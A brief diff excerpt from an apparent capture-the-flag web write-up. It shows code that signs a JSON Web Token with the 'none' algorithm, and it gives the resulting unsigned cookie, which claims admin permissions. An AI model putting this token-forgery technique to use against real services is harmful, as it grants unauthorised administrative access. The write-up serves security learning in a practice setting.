Annubis45/AXASESCTF2020/Web/readme.md

         rolled: "no"
       }, crypto.randomBytes(32), { algorithm: "none"  });
 ```

-and testing it: it is a  WIN !
+It is a  WIN !

 The cookie to set : 'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJwZXJtcyI6ImFkbWluIiwic2VjcmV0aWQiOiJhIiwicm9sbGVkIjoibm8iLCJpYXQiOjE2MDYxNDAyMTl9.'